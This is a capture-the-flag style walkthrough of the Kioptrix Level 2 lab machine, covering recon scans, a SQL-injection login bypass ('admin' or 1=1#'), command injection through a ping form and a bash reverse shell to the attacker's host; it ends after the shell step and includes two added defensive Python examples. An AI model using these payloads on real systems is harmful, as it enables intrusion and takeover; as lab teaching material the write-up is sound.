The Kioptrix series written by loneferret continues with its second part. The important information-security lesson to take from this part is: do not trust any user of your web application. In short, the principle reads "Never Trust, Always Verify". Let us follow the short journey of hunting for vulnerabilities on the Kioptrix-02 machine. As in the previous story, this one is divided into three stages: Scanning and Enumeration, Mapping the Attack Surface, and Exploitation and Post-Exploitation.
Through this story, all Electronic System Operators are expected to stay vigilant about vulnerabilities in their systems, bearing in mind that Article 11 of Government Regulation No. 71 of 2019 on the Operation of Electronic Systems and Transactions mandates that they be able to guarantee the security of the Electronic Systems they manage.
Stage One: Scanning and Enumeration
The tool we use in this information-gathering stage is nmap, a tool that became popular after it appeared in the Hollywood film The Matrix. According to the information it gathered, the main function of the Kioptrix-02 machine is a web server running Apache (2.0.52) with MySQL (version not yet known) as its database, on a CentOS operating system (version not yet known). Here is the information collected by nmap:
root@kali2:~# nmap -p- -A 192.168.216.148
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-18 20:06 PDT
Nmap scan report for 192.168.216.148 (192.168.216.148)
Host is up (0.00073s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            652/udp  status
|_  100024  1            655/tcp  status
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-19T14:07:01+00:00; +10h59m40s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
655/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:3F:59:E2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 10h59m39s, deviation: 0s, median: 10h59m39s

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.216.148 (192.168.216.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.59 seconds
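The scan above already carries several findings a defender would act on before looking at the web application at all: SSH protocol 1, SSLv2 with export-grade ciphers, the PUT method on CUPS and a MySQL listener reachable from the network. As an added example (not part of the original post), the Python below runs a small triage over a constructed excerpt of that nmap output: it groups each port line with the NSE script lines beneath it and reports those findings per port. The excerpt, the check list and the function names are my own.

```python
import re

# Constructed excerpt of the nmap normal output shown above (trimmed to the
# lines the triage needs; real input would be the full scan text).
NMAP_OUTPUT = """\
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
3306/tcp open  mysql      MySQL (unauthorized)
"""

# A port line: "<port>/<proto>  <state>  <service>  [<version>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# (substring to look for in a port's NSE script output, finding text)
CHECKS = [
    ("Server supports SSHv1", "SSH protocol 1 enabled"),
    ("SSLv2 supported", "SSLv2 enabled"),
    ("EXPORT40", "export-grade (40-bit) cipher offered"),
    ("Potentially risky methods: PUT", "HTTP PUT allowed"),
]


def parse_ports(text):
    """Return one dict per port line; NSE script lines ('|' ...) that follow a
    port line are attached to that port."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            entries.append({"port": int(port), "proto": proto, "state": state,
                            "service": service, "version": version.strip(),
                            "scripts": []})
        elif line.startswith("|") and entries:
            entries[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return entries


def triage(text):
    """Return [(port, finding)] for the legacy-protocol and exposure checks."""
    findings = []
    for e in parse_ports(text):
        script_blob = "\n".join(e["scripts"])
        for needle, message in CHECKS:
            if needle in script_blob:
                findings.append((e["port"], message))
        if e["service"] == "mysql":
            findings.append((e["port"], "database listener exposed on the network"))
    return findings


if __name__ == "__main__":
    for port, message in triage(NMAP_OUTPUT):
        print("%5d  %s" % (port, message))
```

The same parser works on the full `-A` output because lines that are neither a port line nor a `|` script line (host key fingerprints aside, which are script lines and harmless here) are simply skipped.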
The information gathered so far is sufficient, but the HTTP service needs further enumeration. For that we use nikto, whatweb and dirb. From these three tools we learn two additional things: the server-side language is PHP (version 4.3.9), and some folders are published to the internet, namely the manual folder.
root@kali2:~# nikto -h http://192.168.216.148/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.216.148
+ Target Hostname:    192.168.216.148
+ Target Port:        80
+ Start Time:         2020-04-18 20:21:45 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 10:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-04-18 20:22:30 (GMT-7) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali2:~# whatweb http://192.168.216.148 -v
WhatWeb report for http://192.168.216.148
Status    : 200 OK
Title     : <None>
IP        : 192.168.216.148
Country   : RESERVED, ZZ

Summary   : HTTPServer[CentOS][Apache/2.0.52 (CentOS)], X-Powered-By[PHP/4.3.9], Apache[2.0.52], PasswordField[psw], PHP[4.3.9]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.
        Version      : 2.0.52 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to identify the operating system from the server header.
        OS           : CentOS
        String       : Apache/2.0.52 (CentOS) (from server string)

[ PHP ]
        PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present.
        Version      : 4.3.9
        Google Dorks: (2)
        Website     : http://www.php.net/

[ PasswordField ]
        find password fields
        String       : psw (from field name)

[ X-Powered-By ]
        X-Powered-By HTTP header
        String       : PHP/4.3.9 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sun, 19 Apr 2020 15:20:13 GMT
        Server: Apache/2.0.52 (CentOS)
        X-Powered-By: PHP/4.3.9
        Content-Length: 667
        Connection: close
        Content-Type: text/html; charset=UTF-8

root@kali2:~/Documents# dirb http://192.168.216.148

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Apr 18 21:12:36 2020
URL_BASE: http://192.168.216.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.216.148/ ----
+ http://192.168.216.148/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.216.148/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.216.148/manual/
+ http://192.168.216.148/usage (CODE:403|SIZE:288)

---- Entering directory: http://192.168.216.148/manual/ ----
==> DIRECTORY: http://192.168.216.148/manual/de/
==> DIRECTORY: http://192.168.216.148/manual/developer/
==> DIRECTORY: http://192.168.216.148/manual/en/
==> DIRECTORY: http://192.168.216.148/manual/faq/
==> DIRECTORY: http://192.168.216.148/manual/fr/
==> DIRECTORY: http://192.168.216.148/manual/howto/
==> DIRECTORY: http://192.168.216.148/manual/images/
+ http://192.168.216.148/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.216.148/manual/ja/
==> DIRECTORY: http://192.168.216.148/manual/ko/
+ http://192.168.216.148/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/misc/
==> DIRECTORY: http://192.168.216.148/manual/mod/
==> DIRECTORY: http://192.168.216.148/manual/programs/
==> DIRECTORY: http://192.168.216.148/manual/ru/
==> DIRECTORY: http://192.168.216.148/manual/ssl/
==> DIRECTORY: http://192.168.216.148/manual/style/

---- Entering directory: http://192.168.216.148/manual/de/ ----
+ http://192.168.216.148/manual/de/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/de/developer/
+ http://192.168.216.148/manual/de/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/de/faq/
+ http://192.168.216.148/manual/de/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/de/howto/
==> DIRECTORY: http://192.168.216.148/manual/de/images/
+ http://192.168.216.148/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.216.148/manual/de/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/de/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/de/misc/
==> DIRECTORY: http://192.168.216.148/manual/de/mod/
==> DIRECTORY: http://192.168.216.148/manual/de/programs/
+ http://192.168.216.148/manual/de/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/de/ssl/
==> DIRECTORY: http://192.168.216.148/manual/de/style/

---- Entering directory: http://192.168.216.148/manual/developer/ ----
+ http://192.168.216.148/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/en/ ----
+ http://192.168.216.148/manual/en/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/en/developer/
+ http://192.168.216.148/manual/en/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/en/faq/
+ http://192.168.216.148/manual/en/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/en/howto/
==> DIRECTORY: http://192.168.216.148/manual/en/images/
+ http://192.168.216.148/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.216.148/manual/en/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/en/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/en/misc/
==> DIRECTORY: http://192.168.216.148/manual/en/mod/
==> DIRECTORY: http://192.168.216.148/manual/en/programs/
+ http://192.168.216.148/manual/en/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/en/ssl/
==> DIRECTORY: http://192.168.216.148/manual/en/style/

---- Entering directory: http://192.168.216.148/manual/faq/ ----
+ http://192.168.216.148/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/fr/ ----
+ http://192.168.216.148/manual/fr/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/fr/developer/
+ http://192.168.216.148/manual/fr/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/fr/faq/
+ http://192.168.216.148/manual/fr/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/fr/howto/
==> DIRECTORY: http://192.168.216.148/manual/fr/images/
+ http://192.168.216.148/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.216.148/manual/fr/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/fr/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/fr/misc/
==> DIRECTORY: http://192.168.216.148/manual/fr/mod/
==> DIRECTORY: http://192.168.216.148/manual/fr/programs/
+ http://192.168.216.148/manual/fr/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/fr/ssl/
==> DIRECTORY: http://192.168.216.148/manual/fr/style/

---- Entering directory: http://192.168.216.148/manual/howto/ ----
+ http://192.168.216.148/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.216.148/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ja/ ----
+ http://192.168.216.148/manual/ja/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ja/developer/
+ http://192.168.216.148/manual/ja/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ja/faq/
+ http://192.168.216.148/manual/ja/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ja/howto/
==> DIRECTORY: http://192.168.216.148/manual/ja/images/
+ http://192.168.216.148/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.216.148/manual/ja/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ja/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/ja/misc/
==> DIRECTORY: http://192.168.216.148/manual/ja/mod/
==> DIRECTORY: http://192.168.216.148/manual/ja/programs/
+ http://192.168.216.148/manual/ja/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ja/ssl/
==> DIRECTORY: http://192.168.216.148/manual/ja/style/

---- Entering directory: http://192.168.216.148/manual/ko/ ----
+ http://192.168.216.148/manual/ko/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ko/developer/
+ http://192.168.216.148/manual/ko/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ko/faq/
+ http://192.168.216.148/manual/ko/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ko/howto/
==> DIRECTORY: http://192.168.216.148/manual/ko/images/
+ http://192.168.216.148/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.216.148/manual/ko/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ko/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/ko/misc/
==> DIRECTORY: http://192.168.216.148/manual/ko/mod/
==> DIRECTORY: http://192.168.216.148/manual/ko/programs/
+ http://192.168.216.148/manual/ko/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ko/ssl/
==> DIRECTORY: http://192.168.216.148/manual/ko/style/

---- Entering directory: http://192.168.216.148/manual/misc/ ----
+ http://192.168.216.148/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/mod/ ----
+ http://192.168.216.148/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.216.148/manual/programs/ ----
+ http://192.168.216.148/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.216.148/manual/ru/ ----
+ http://192.168.216.148/manual/ru/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ru/developer/
+ http://192.168.216.148/manual/ru/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ru/faq/
+ http://192.168.216.148/manual/ru/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ru/howto/
==> DIRECTORY: http://192.168.216.148/manual/ru/images/
+ http://192.168.216.148/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.216.148/manual/ru/ja (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ru/ko (CODE:301|SIZE:321)
+ http://192.168.216.148/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.216.148/manual/ru/misc/
==> DIRECTORY: http://192.168.216.148/manual/ru/mod/
==> DIRECTORY: http://192.168.216.148/manual/ru/programs/
+ http://192.168.216.148/manual/ru/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ru/ssl/
==> DIRECTORY: http://192.168.216.148/manual/ru/style/

---- Entering directory: http://192.168.216.148/manual/ssl/ ----
+ http://192.168.216.148/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/de/developer/ ----
+ http://192.168.216.148/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/de/faq/ ----
+ http://192.168.216.148/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/de/howto/ ----
+ http://192.168.216.148/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.216.148/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/de/misc/ ----
+ http://192.168.216.148/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/de/mod/ ----
+ http://192.168.216.148/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.216.148/manual/de/programs/ ----
+ http://192.168.216.148/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.216.148/manual/de/ssl/ ----
+ http://192.168.216.148/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/en/developer/ ----
+ http://192.168.216.148/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/en/faq/ ----
+ http://192.168.216.148/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/en/howto/ ----
+ http://192.168.216.148/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.216.148/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/en/misc/ ----
+ http://192.168.216.148/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/en/mod/ ----
+ http://192.168.216.148/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.216.148/manual/en/programs/ ----
+ http://192.168.216.148/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.216.148/manual/en/ssl/ ----
+ http://192.168.216.148/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/fr/developer/ ----
+ http://192.168.216.148/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/fr/faq/ ----
+ http://192.168.216.148/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/fr/howto/ ----
+ http://192.168.216.148/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.216.148/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/fr/misc/ ----
+ http://192.168.216.148/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/fr/mod/ ----
+ http://192.168.216.148/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.216.148/manual/fr/programs/ ----
+ http://192.168.216.148/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.216.148/manual/fr/ssl/ ----
+ http://192.168.216.148/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ja/developer/ ----
+ http://192.168.216.148/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/ja/faq/ ----
+ http://192.168.216.148/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/ja/howto/ ----
+ http://192.168.216.148/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.216.148/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ja/misc/ ----
+ http://192.168.216.148/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/ja/mod/ ----
+ http://192.168.216.148/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.216.148/manual/ja/programs/ ----
+ http://192.168.216.148/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.216.148/manual/ja/ssl/ ----
+ http://192.168.216.148/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.216.148/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ko/developer/ ----
+ http://192.168.216.148/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/ko/faq/ ----
+ http://192.168.216.148/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.216.148/manual/ko/howto/ ----
+ http://192.168.216.148/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.216.148/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ko/misc/ ----
+ http://192.168.216.148/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/ko/mod/ ----
+ http://192.168.216.148/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.216.148/manual/ko/programs/ ----
+ http://192.168.216.148/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.216.148/manual/ko/ssl/ ----
+ http://192.168.216.148/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ru/developer/ ----
+ http://192.168.216.148/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.216.148/manual/ru/faq/ ----
+ http://192.168.216.148/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.216.148/manual/ru/howto/ ----
+ http://192.168.216.148/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.216.148/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.148/manual/ru/misc/ ----
+ http://192.168.216.148/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.216.148/manual/ru/mod/ ----
+ http://192.168.216.148/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.216.148/manual/ru/programs/ ----
+ http://192.168.216.148/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.216.148/manual/ru/ssl/ ----
+ http://192.168.216.148/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.216.148/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Apr 18 21:21:59 2020
DOWNLOADED: 262884 - FOUND: 102
There is nothing interesting in the manual folder; on inspection it contains no more than the Apache Web Server user manual. The file worth examining is index.php, which is a login form, as shown in Figure 1:

Stage Two: Mapping the Attack Surface
Based on the information gathered in the previous stage, the possible attacks can be mapped (see Figure 2) onto three services: SSH, HTTP and ipp. For SSH, no Remote Code Execution (RCE) potential was found, because no buffer overflow vulnerability is known for OpenSSH version 3.9p1; the same holds for the ipp service (CUPS 1.1). A brute-force attack against SSH was not feasible either, because no valid user account had been found.

The remaining valid attack vector is therefore an injection vulnerability, namely SQL Injection. After several attempts, entering admin' or 1=1# in the Username field turned out to bypass the login form on the Kioptrix-02 machine, as shown in the following two figures:


is a potential attack target
Analysing the form further, one can conclude that it executes several operating-system commands at once when they are joined with the ";" (semicolon) symbol. This is a feature of the command shell on Linux. This can be seen in the following two figures:
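The semicolon works because the form passes user input to a shell, which treats ";" as a command separator. As an added example, not code from the Kioptrix machine (the page does not show the PHP behind the form), the Python below contrasts the string a shell-based handler would execute with a hardened handler that accepts only a literal IP address and runs ping with an argument list, so the shell never sees the input. The function names and sample inputs are my own.

```python
import ipaddress
import subprocess


def validate_host(value: str) -> str:
    """Accept only a literal IPv4/IPv6 address and return its canonical form.
    Anything else, such as '127.0.0.1;id', is rejected before any command
    is built; there is no attempt to strip or escape 'bad' characters."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError("not an IP address: %r" % value) from None


def is_accepted(value: str) -> bool:
    """True if validate_host() would accept the input."""
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def unsafe_command_line(value: str) -> str:
    """The string a shell=True (or shell_exec-style) handler would hand to
    /bin/sh, built by concatenation. Returned for inspection only, never run."""
    return "ping -c 1 " + value


def build_ping_argv(value: str) -> list:
    """Validated host as its own argv element: no shell, no word splitting,
    so ';', '|', '&&' and '$()' are just characters that fail validation."""
    return ["ping", "-c", "1", validate_host(value)]


def run_ping(value: str) -> subprocess.CompletedProcess:
    """Execute the hardened form; argv list, shell=False (the default)."""
    return subprocess.run(build_ping_argv(value), capture_output=True,
                          text=True, timeout=10, check=False)


if __name__ == "__main__":
    chained = "127.0.0.1;id"                 # constructed sample input
    print("shell would run :", unsafe_command_line(chained))
    print("accepted?       :", is_accepted(chained))
    print("hardened argv   :", build_ping_argv("127.0.0.1"))
```

If the form must accept host names as well, validate them against a strict host-name grammar (letters, digits, hyphens and dots only) or resolve them first and pass the resulting address; the argv-list rule stays the same either way.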


Stage Three: Exploitation and Post-Exploitation
The analysis in the previous stage shows that the Username field in index.php carries a valid vulnerability with great potential as an entry point to take over the whole system. In this Exploitation and Post-Exploitation stage the attack is therefore focused on that vulnerability.
The first attack step is to obtain a limited shell, by making the Kioptrix-02 machine connect back to the attacker with a reverse shell. The reverse-shell command submitted through the form is chained with the ping command into a single command sequence: 127.0.0.1;bash -i >& /dev/tcp/192.168.216.149/4444 0>&1. On the attacker's side, netcat is used to listen on port 4444 (see Figure 7).


